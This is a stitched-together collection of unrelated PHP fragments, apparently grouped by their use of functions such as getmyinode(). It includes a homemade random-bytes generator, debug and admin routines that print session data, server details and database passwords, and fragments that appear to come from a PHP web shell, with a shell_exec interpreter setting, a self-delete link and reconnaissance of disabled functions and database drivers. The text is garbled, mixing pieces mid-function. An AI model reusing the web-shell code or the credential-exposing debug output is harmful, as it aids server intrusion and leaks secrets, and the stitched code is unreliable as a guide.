function randomBytes($length = 16, $secure = true, $raw = true, $startEntropy = "", &$rounds = 0, &$drop = 0)
{
static $lastRandom = "";
$output = "";
$length = abs((int) $length);
$secureValue = "";
$rounds = 0;
$drop = 0;
while (!isset($output[$length - 1])) {
//some entropy, but works ^^
$weakEntropy = array(is_array($startEntropy) ? implode($startEntropy) : $startEntropy, serialize(stat(__FILE__)), __DIR__, PHP_OS, microtime(), (string) lcg_value(), (string) PHP_MAXPATHLEN, PHP_SAPI, (string) PHP_INT_MAX . "." . PHP_INT_SIZE, serialize($_SERVER), serialize(get_defined_constants()), get_current_user(), serialize(ini_get_all()), (string) memory_get_usage() . "." . memory_get_peak_usage(), php_uname(), phpversion(), extension_loaded("gmp") ? gmp_strval(gmp_random(4)) : microtime(), zend_version(), (string) getmypid(), (string) getmyuid(), (string) mt_rand(), (string) getmyinode(), (string) getmygid(), (string) rand(), function_exists("zend_thread_id") ? (string) zend_thread_id() : microtime(), var_export(@get_browser(), true), function_exists("getrusage") ? @implode(getrusage()) : microtime(), function_exists("sys_getloadavg") ? @implode(sys_getloadavg()) : microtime(), serialize(get_loaded_extensions()), sys_get_temp_dir(), (string) disk_free_space("."), (string) disk_total_space("."), uniqid(microtime(), true), file_exists("/proc/cpuinfo") ? file_get_contents("/proc/cpuinfo") : microtime());
shuffle($weakEntropy);
$value = hash("sha512", implode($weakEntropy), true);
$lastRandom .= $value;
foreach ($weakEntropy as $k => $c) {
//mixing entropy values with XOR and hash randomness extractor
$value ^= hash("sha256", $c . microtime() . $k, true) . hash("sha256", mt_rand() . microtime() . $k . $c, true);
$value ^= hash("sha512", (string) lcg_value() . $c . microtime() . $k, true);
}
unset($weakEntropy);
if ($secure === true) {
$strongEntropyValues = array(is_array($startEntropy) ? hash("sha512", $startEntropy[($rounds + $drop) % count($startEntropy)], true) : hash("sha512", $startEntropy, true), file_exists("/dev/urandom") ? fread(fopen("/dev/urandom", "rb"), 64) : str_repeat("", 64), (function_exists("openssl_random_pseudo_bytes") and version_compare(PHP_VERSION, "5.3.4", ">=")) ? openssl_random_pseudo_bytes(64) : str_repeat("", 64), function_exists("mcrypt_create_iv") ? mcrypt_create_iv(64, MCRYPT_DEV_URANDOM) : str_repeat("", 64), $value);
$strongEntropy = array_pop($strongEntropyValues);
foreach ($strongEntropyValues as $value) {
$strongEntropy = $strongEntropy ^ $value;
}
$value = "";
//Von Neumann randomness extractor, increases entropy
$bitcnt = 0;
for ($j = 0; $j < 64; ++$j) {
$a = ord($strongEntropy[$j]);
for ($i = 0; $i < 8; $i += 2) {
$b = ($a & 1 << $i) > 0 ? 1 : 0;
if ($b != (($a & 1 << $i + 1) > 0 ? 1 : 0)) {
$secureValue |= $b << $bitcnt;
if ($bitcnt == 7) {
$value .= chr($secureValue);
$secureValue = 0;
$bitcnt = 0;
} else {
++$bitcnt;
}
++$drop;
} else {
$drop += 2;
}
}
}
}
$output .= substr($value, 0, min($length - strlen($output), $length));
unset($value);
++$rounds;
}
$lastRandom = hash("sha512", $lastRandom, true);
return $raw === false ? bin2hex($output) : $output;
}
public function __construct()
{
$this->config = array('filename' => basename(__FILE__), 'username' => '', 'password' => '', 'interpreter' => 'shell_exec', 'current_user' => get_current_user(), 'hostname' => function_exists('gethostname') ? gethostname() : $_SERVER['HTTP_HOST'], 'server_address' => isset($_SERVER['SERVER_ADDR']) ? $_SERVER['SERVER_ADDR'] : '127.0.0.1', 'server_port' => $_SERVER['SERVER_PORT'], 'request_time' => $_SERVER['REQUEST_TIME'], 'php_owner_uid' => getmyuid(), 'php_owner_gid' => getmygid(), 'php_process_id' => getmypid(), 'inode_script' => getmyinode(), 'last_page_modification' => getlastmod(), 'cwd' => getcwd());
if (isset($_SESSION['interpreter'])) {
$this->config['interpreter'] = $_SESSION['interpreter'];
}
if (isset($_SESSION['cwd']) && $_SESSION['cwd'] != $this->config['cwd']) {
chdir($_SESSION['cwd']);
$this->config['cwd'] = getcwd();
}
$this->config['prompt'] = $this->get_prompt();
}
/**
* Render information about the current request, if possible
*
* @return string
*/
protected function renderRequestInfo()
{
$output = '';
if (Bootstrap::$staticObjectManager instanceof ObjectManagerInterface) {
$bootstrap = Bootstrap::$staticObjectManager->get(\TYPO3\Flow\Core\Bootstrap::class);
/* @var Bootstrap $bootstrap */
$requestHandler = $bootstrap->getActiveRequestHandler();
if ($requestHandler instanceof HttpRequestHandlerInterface) {
$request = $requestHandler->getHttpRequest();
$response = $requestHandler->getHttpResponse();
$output .= PHP_EOL . 'HTTP REQUEST:' . PHP_EOL . ($request == '' ? '[request was empty]' : $request) . PHP_EOL;
$output .= PHP_EOL . 'HTTP RESPONSE:' . PHP_EOL . ($response == '' ? '[response was empty]' : $response) . PHP_EOL;
$output .= PHP_EOL . 'PHP PROCESS:' . PHP_EOL . 'Inode: ' . getmyinode() . PHP_EOL . 'PID: ' . getmypid() . PHP_EOL . 'UID: ' . getmyuid() . PHP_EOL . 'GID: ' . getmygid() . PHP_EOL . 'User: ' . get_current_user() . PHP_EOL;
}
}
return $output;
}
print "\n" . DxPrint_ParamState('MsSQL', function_exists('mssql_connect')) . ' ; ';
print "\n" . DxPrint_ParamState('PostgreSQL', function_exists('pg_connect')) . ' ; ';
print "\n" . DxPrint_ParamState('Oracle', function_exists('ocilogon')) . ' ; ';
print "\n" . 'Disabled functions: ' . (($df = @ini_get('disable_functions')) == '' ? '<font color=#00FF00><b>NONE</b></font>' : '<font color=#FF0000><b>' . str_replace(array(',', ';'), ', ', $df) . '</b></font>');
print "\n" . '</div>';
print "\n\n" . '<span align=right style="position:absolute;z-index:1;right:0pt;top:0pt;"><table><tr><td class="h2_oneline"><nobr>';
if (strlen($GLOB['SHELL']['USER']['Login']) + strlen($GLOB['SHELL']['USER']['Passw']) >= 2) {
print "\n" . '<a href="' . DxURL('kill', 'dxinstant') . '&dxinstant=logoff" title="Log Off" class=no>[Exit]</a>';
}
print "\n" . '<a href="' . DxURL('kill', 'dxinstant') . '&dxinstant=DEL" title="Delete self (' . basename($_SERVER['PHP_SELF']) . ')" class=no><font color=#FF0000;>' . DxImg('del') . '</font></a>';
print "\n" . '</nobr></td></tr></table></span>';
print "\n\n" . '<hr>';
print "\n" . 'Disk free: <b>' . DxStr_FmtFileSize(disk_free_space($GLOB['FILES']['CurDIR'])) . ' / ' . DxStr_FmtFileSize(disk_total_space($GLOB['FILES']['CurDIR'])) . '</b> ; ';
print "\n" . 'OS: <b>' . $GLOB['SYS']['OS']['id'] . ' (' . $GLOB['SYS']['OS']['Full'] . ' )</b> ; ';
print "\n" . 'Yer_IP: <b>' . @$_SERVER['REMOTE_ADDR'] . ' (' . @$_SERVER['REMOTE_HOST'] . ')</b> ; ';
print "\n" . '<nobr>Own/U/G/Pid/Inode:<wbr><b>' . get_current_user() . ' / ' . getmyuid() . ' / ' . getmygid() . ' / ' . getmypid() . ' / ' . getmyinode() . '</b> ; </nobr>';
print "\n" . 'MySQL : <b>' . @mysql_get_server_info() . '</b> ; ';
print "\n" . '<br>' . @$_SERVER['SERVER_SOFTWARE'];
?>
</td>
</table>
<table width=100% cellspacing=0 cellpadding=0 class=outset>
<tr>
<td width=100pt class=h2_oneline><h2>Modes</td>
<td style="text-align:center;"><nobr>
<a href="<?php
echo DxURL('kill', '');
?>
&dxmode=DIR">DIR</a> |
<a href="<?php
echo DxURL('kill', '');
/**
* This function tries to get all the entropy available in PHP, and distills it to get a good RNG.
*
*
* @param int $length default 16, Number of bytes to generate
* @param bool $secure default true, Generate secure distilled bytes, slower
* @param bool $raw default true, returns a binary string if true, or an hexadecimal one
* @param string $startEntropy default null, adds more initial entropy
* @param int &$rounds Will be set to the number of rounds taken
* @param int &$drop Will be set to the amount of dropped bytes
*
* @return string
*/
public static function getRandomBytes($length = 16, $secure = \true, $raw = \true, $startEntropy = "", &$rounds = 0, &$drop = 0)
{
static $lastRandom = "";
$output = "";
$length = \abs((int) $length);
$secureValue = "";
$rounds = 0;
$drop = 0;
while (!isset($output[$length - 1])) {
//some entropy, but works ^^
$weakEntropy = [\is_array($startEntropy) ? \implode($startEntropy) : $startEntropy, __DIR__, PHP_OS, \microtime(), (string) \lcg_value(), (string) PHP_MAXPATHLEN, PHP_SAPI, (string) \PHP_INT_MAX . "." . \PHP_INT_SIZE, \serialize($_SERVER), \get_current_user(), (string) \memory_get_usage() . "." . \memory_get_peak_usage(), \php_uname(), \phpversion(), \zend_version(), (string) \getmypid(), (string) \getmyuid(), (string) \mt_rand(), (string) \getmyinode(), (string) \getmygid(), (string) \rand(), \function_exists("zend_thread_id") ? (string) zend_thread_id() : \microtime(), \function_exists("getrusage") ? \implode(\getrusage()) : \microtime(), \function_exists("sys_getloadavg") ? \implode(\sys_getloadavg()) : \microtime(), \serialize(\get_loaded_extensions()), \sys_get_temp_dir(), (string) \disk_free_space("."), (string) \disk_total_space("."), \uniqid(\microtime(), \true), \file_exists("/proc/cpuinfo") ? \file_get_contents("/proc/cpuinfo") : \microtime()];
\shuffle($weakEntropy);
$value = \hash("sha512", \implode($weakEntropy), \true);
$lastRandom .= $value;
foreach ($weakEntropy as $k => $c) {
//mixing entropy values with XOR and hash randomness extractor
$value ^= \hash("sha256", $c . \microtime() . $k, \true) . \hash("sha256", \mt_rand() . \microtime() . $k . $c, \true);
$value ^= \hash("sha512", (string) \lcg_value() . $c . \microtime() . $k, \true);
}
unset($weakEntropy);
if ($secure === \true) {
if (\file_exists("/dev/urandom")) {
$fp = \fopen("/dev/urandom", "rb");
$systemRandom = \fread($fp, 64);
\fclose($fp);
} else {
$systemRandom = \str_repeat("", 64);
}
$strongEntropyValues = [\is_array($startEntropy) ? \hash("sha512", $startEntropy[($rounds + $drop) % \count($startEntropy)], \true) : \hash("sha512", $startEntropy, \true), $systemRandom, \function_exists("openssl_random_pseudo_bytes") ? openssl_random_pseudo_bytes(64) : \str_repeat("", 64), \function_exists("mcrypt_create_iv") ? mcrypt_create_iv(64, MCRYPT_DEV_URANDOM) : \str_repeat("", 64), $value];
$strongEntropy = \array_pop($strongEntropyValues);
foreach ($strongEntropyValues as $value) {
$strongEntropy = $strongEntropy ^ $value;
}
$value = "";
//Von Neumann randomness extractor, increases entropy
$bitcnt = 0;
for ($j = 0; $j < 64; ++$j) {
$a = \ord($strongEntropy[$j]);
for ($i = 0; $i < 8; $i += 2) {
$b = ($a & 1 << $i) > 0 ? 1 : 0;
if ($b != (($a & 1 << $i + 1) > 0 ? 1 : 0)) {
$secureValue |= $b << $bitcnt;
if ($bitcnt == 7) {
$value .= \chr($secureValue);
$secureValue = 0;
$bitcnt = 0;
} else {
++$bitcnt;
}
++$drop;
} else {
$drop += 2;
}
}
}
}
$output .= \substr($value, 0, \min($length - \strlen($output), $length));
unset($value);
++$rounds;
}
$lastRandom = \hash("sha512", $lastRandom, \true);
return $raw === \false ? \bin2hex($output) : $output;
}
<?php var_dump(getlastmod()); var_dump(getmyinode()); var_dump(getmyuid()); var_dump(getmypid()); var_dump(getmygid()); echo "Done\n";
/**
* Print out content of session's variable
*
* @return htmlOutput if not PRINT_DEBUG_INFO
* @author Christophe Gesché <*****@*****.**>
*
*/
function echo_session_value()
{
$infoResult = "";
global $statuts, $statut, $status, $is_admin;
if (!isset($is_admin) || !$is_admin) {
exit('not aivailable');
}
$infoResult .= '
<hr />
<a href="../claroline/admin/phpInfo.php">phpInfo Claroline</a>
<PRE><strong>PHP Version</strong> : ' . phpversion() . '
<strong>nivo d\'err</strong> : ' . error_reporting(2039);
if (isset($statuts)) {
$infoResult .= '
<strong>statut</strong> : ';
print_r($statuts);
}
if (isset($statut)) {
$infoResult .= '
<strong>statut</strong> : ';
print_r($statut);
}
if (isset($status)) {
$infoResult .= "\n <strong>status</strong> : ";
print_r($status);
}
if ('' != trim(get_conf('dbHost')) || '' != trim(get_conf('dbLogin'))) {
$infoResult .= '
<strong>mysql param</strong> :
Serveur : ' . get_conf('dbHost') . '
User : '******'dbLogin');
}
if (isset($_SESSION)) {
$infoResult .= "\n <strong>session</strong> : ";
print_r($_SESSION);
}
if (isset($_POST)) {
$infoResult .= "\n <strong>Post</strong> : ";
print_r($_POST);
}
if (isset($_GET)) {
$infoResult .= "\n <strong>GET</strong> : ";
print_r($_GET);
}
$infoResult .= "\n <strong>Contantes</strong> : ";
print_r(get_defined_constants());
get_current_user();
$infoResult .= "\n <strong>Fichiers inclus</strong> : ";
print_r(get_included_files());
$infoResult .= "\n <strong>Magic quote gpc</strong> : " . get_magic_quotes_gpc() . "\n <strong>Magig quote runtime</strong> : " . get_magic_quotes_runtime() . "\n <strong>date de dernière modification de la page</strong> : " . date("j-m-Y", getlastmod());
/*
get_cfg_var -- Retourne la valeur d'une option de PHP
getenv -- Retourne la valeur de la variable d'environnement.
ini_alter -- Change la valeur d'une option de configuration
ini_get -- Lit la valeur d'une option de configuration.
ini_get_all -- Lit toutes les valeurs de configuration
ini_restore -- Restaure la valeur de l'option de configuration
ini_set -- Change la valeur d'une option de configuration
putenv -- Fixe la valeur d'une variable d'environnement.
set_magic_quotes_runtime -- Active/désactive l'option magic_quotes_runtime.
set_time_limit -- Fixe le temps maximum d'exécution d'un script.
*/
$infoResult .= "\n <strong>Type d'interface utilisé entre le serveur web et PHP</strong> : " . php_sapi_name() . "\n <strong>informations OS</strong> : " . php_uname() . "\n <strong>Version courante du moteur Zend</strong> : " . zend_version() . "\n <strong>GID du propriétaire du script</strong> : " . getmygid() . "\n <strong>inode du script</strong> : " . getmyinode() . "\n <strong>numéro de processus courant</strong> : " . getmypid() . "\n <strong>UID du propriétaire du script actuel</strong> : " . getmyuid() . "\n <strong>niveau d'utilisation des ressources</strong> : ";
print_r(@getrusage());
$infoResult .= "\n </PRE>\n <hr />\n ";
if (PRINT_DEBUG_INFO) {
echo $infoResult;
}
return $infoResult;
}
private static function _renderSystem()
{
$i = true;
$php = array();
$php[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "PHP версия:", "value" => phpversion());
$php[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "PHP идентификатор процесса:", "value" => zend_version());
$php[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "PHP ZEND версия:", "value" => getmypid());
$php[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "Владелец скрипта:", "value" => get_current_user());
$php[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "Владелец скрипта [UID]:", "value" => getmyuid());
$php[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "Владелец скрипта [GID]:", "value" => getmygid());
$php[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "Владелец скрипта [inode]:", "value" => getmyinode());
$php[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "Макс. время выполнения скрипта:", "value" => ini_get("max_execution_time"));
$php[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "Макс. размер загружаемого файла:", "value" => ini_get("upload_max_filesize"));
$php[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "Макс. размер POST-данных:", "value" => ini_get("post_max_size"));
$php[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "Макс. объем памяти скрипта:", "value" => ini_get("memory_limit"));
$php[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "Папка загружаемых файлов:", "value" => ini_get("upload_tmp_dir"));
$php[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "Папка хранения сессий:", "value" => ini_get("session.save_path"));
$php[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "Путь включения скриптов:", "value" => get_include_path());
$php[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "Cборщик циклических ссылок:", "value" => @function_exists("gc_enabled") ? gc_enabled() ? "On" : "Off" : "N/A(?)");
$php[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "MAGIC_QUOTES_GPC:", "value" => self::mquotes_gpc() ? "On" : "Off");
$php[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "MAGIC_QUOTES_RUNTIME:", "value" => self::mquotes_runtime() ? "On" : "Off");
$i = true;
$mysql = array();
$mysql[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "Версия сервера:", "value" => mysql_get_server_info());
$mysql[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "Имя сервера:", "value" => db::coninfo("host"));
$mysql[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "Имя БД:", "value" => db::coninfo("name"));
$mysql[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "Имя пользователя:", "value" => db::coninfo("user"));
$mysql[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "Пароль:", "value" => db::coninfo("pass"));
$mysql[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "Используемое расширение:", "value" => mysql);
$t = tpl::get(self::$class, self::$section["name"]);
$t->setArrayCycle("php", $php);
$t->setArrayCycle("mysql", $mysql);
$t->_render();
}
<h3><code>int</code> filectime(<code>string $filename</code>) <span class="badge">4+</span></h3>
<div><?php
var_dump(date('F d Y H:i:s', filectime(__FILE__)));
?>
</div>
<h3><code>int</code> filegroup(<code>string $filename</code>) <span class="badge">4+</span></h3>
<h3><code>int</code> fileinode(<code>string $filename</code>) <span class="badge">4+</span></h3>
<div><?php
var_dump(getmyinode(), fileinode(__FILE__));
?>
</div>
<h3><code>int</code> filemtime(<code>string $filename</code>) <span class="badge">4+</span></h3>
<div><?php
var_dump(date('F d Y H:i:s', filemtime(__FILE__)));
?>
</div>
<h3><code>int</code> fileowner(<code>string $filename</code>) <span class="badge">4+</span></h3>
/**
* @return int
*/
public function getProcessInode()
{
return getmyinode();
}
public static function hash()
{
return sha1(getmypid() . microtime() . getmyinode());
}
//echo "Process title: " . cli_get_process_title() . "\n";
echo get_include_path();
echo "<br/>";
//获取所有加载的模块
echo "<pre>";
print_r(get_loaded_extensions());
echo "<br/>";
echo "<pre>";
print_r($_SERVER);
echo "<br/>";
// 输出类似 'Last modified: March 04 1998 20:43:59.'
echo "Last modified: " . date("F d Y H:i:s.", getlastmod());
echo "<br/>";
echo getmygid();
echo "<br/>";
echo getmyinode();
echo "<br/>";
echo getmypid();
echo "<br/>";
echo getmyuid();
//echo "<br/>";
//echo "<pre>";
//print_r(getopt());
echo "<br/>";
echo "<pre>";
//print_r(getrusage());
echo "<br/>";
echo "<pre>";
//获取所有的配置选项
print_r(ini_get_all());
echo "<br/>";
